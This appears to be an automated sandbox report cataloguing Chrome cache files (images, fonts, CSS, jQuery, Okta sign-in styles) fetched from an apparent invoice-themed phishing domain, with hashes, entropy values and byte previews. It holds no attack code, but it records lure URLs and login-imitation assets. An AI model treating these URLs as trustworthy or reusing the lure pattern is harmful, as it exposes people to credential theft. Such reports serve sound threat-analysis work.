                                                                                                                                              Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.

                                                                                                                                              Chrome Cache Entry: 217

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10796
                                                                                                                                              Entropy (8bit):7.946024875001343
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                                                                                                              MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                                                                                              SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                                                                                              SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                                                                                              SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.

                                                                                                                                              Chrome Cache Entry: 218

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):26765
                                                                                                                                              Entropy (8bit):5.114987586674101
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:wC8nBSz2omXX44PL5K9kdY8xbXoEYW+8SX:whnBSz2omXo4PL5K9kdY8xb+Ww
                                                                                                                                              MD5:1A862A89D5633FAC83D763886726740D
                                                                                                                                              SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                                                                                              SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                                                                                              SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/12EsS6v4KGIxyn856713
                                                                                                                                              Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go

                                                                                                                                              Chrome Cache Entry: 219

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):7390
                                                                                                                                              Entropy (8bit):4.02755241095864
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                                                                                                              MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                                                                              SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                                                                              SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                                                                              SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/klqxZQ7i49HVQDFkT2K9BPiyyzFXOnXx5i81oj42ckX3Ue56169
                                                                                                                                              Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

                                                                                                                                              Chrome Cache Entry: 220

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):43596
                                                                                                                                              Entropy (8bit):7.9952701440723475
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                                                                                              MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                                              SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                                              SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                                              SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-vf.woff2
                                                                                                                                              Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.

                                                                                                                                              Chrome Cache Entry: 221

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):89501
                                                                                                                                              Entropy (8bit):5.289893677458563
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                                                                                              Chrome Cache Entry: 222

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):17842
                                                                                                                                              Entropy (8bit):7.821645806304586
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:EwTZQ74B48VtrMvbt0sAvPTMaf+j5s8OYbqarRbjy5Qg1AR/kf63z/:hTa4B4mtYztAvPTMFhOYb3Rbu571AJa6
                                                                                                                                              MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                              SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                              SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                              SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/uvtEwEyzMAhf6EpnunDLNl1fXrnAsov2mnPpoo2EjamMRPOTqFQN1a7tgWlOFf9HWC0Fgh260
                                                                                                                                              Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD

                                                                                                                                              Chrome Cache Entry: 223

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):28584
                                                                                                                                              Entropy (8bit):7.992563951996154
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                                                                                                              MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                                              SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                                              SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                                              SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-regular.woff2
                                                                                                                                              Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..

                                                                                                                                              Chrome Cache Entry: 224

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1
                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                              MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:0

                                                                                                                                              Chrome Cache Entry: 225

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):892
                                                                                                                                              Entropy (8bit):5.863167355052868
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:qaPlKKVkz1f+tPUgo/KQGbEZAuYED9qk9neYVxyzyb7PumHe/Q/:qElbQ1f+Bo/LfAuYEJxnHDyzqyQ/
                                                                                                                                              MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                                                                              SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                                                                              SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                                                                              SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/oppCC2yff12YyfUIa0hvdyqmnO1npn8eKKiH67140
                                                                                                                                              Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...

                                                                                                                                              Chrome Cache Entry: 226

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):9648
                                                                                                                                              Entropy (8bit):7.9099172475143416
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:gwTgBYruFELhYmwd93mjW0l9OsENOLWcXdN4CLrHZfTtjOZgYM5cWjAaP6:gwTgBxaYmo5mS0l9OsuOL3NNVLlfTtjE
                                                                                                                                              MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                              SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                              SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                              SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/qr347VQocLux8bJ296y3sGsK0qKDjDkaqzGUesuvjEQdpuQn0RocxGsyZziUJj4ef240
                                                                                                                                              Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....

                                                                                                                                              Chrome Cache Entry: 227

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):644
                                                                                                                                              Entropy (8bit):4.6279651077789685
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:EEasTzWl6/Kjsg9GXlxDfwyf+/11C1+/MguB/KQGXlxD3EZAGxtw006cNOBkP1HJ:PaPlKKVkz1f+tPUgo/KQGbEZAuwz65GH
                                                                                                                                              MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                                              SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                                              SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                                              SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/uveXL7lccWo3VQL1AQNrNkqrY0gg6oIq92t2l012130
                                                                                                                                              Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...

                                                                                                                                              Chrome Cache Entry: 228

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (51734)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):222931
                                                                                                                                              Entropy (8bit):5.0213311632628725
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                                                                                                              MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                                                                              SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                                                                              SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                                                                              SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                                                                                              Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh

                                                                                                                                              Chrome Cache Entry: 229

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):644
                                                                                                                                              Entropy (8bit):4.6279651077789685
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:EEasTzWl6/Kjsg9GXlxDfwyf+/11C1+/MguB/KQGXlxD3EZAGxtw006cNOBkP1HJ:PaPlKKVkz1f+tPUgo/KQGbEZAuwz65GH
                                                                                                                                              MD5:541B83C2195088043337E4353B6FD60D
                                                                                                                                              SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                                                                              SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                                                                              SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...

                                                                                                                                              Chrome Cache Entry: 230

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):268
                                                                                                                                              Entropy (8bit):5.111190711619041
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                                              MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                              SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                              SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                              SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                              Malicious:false
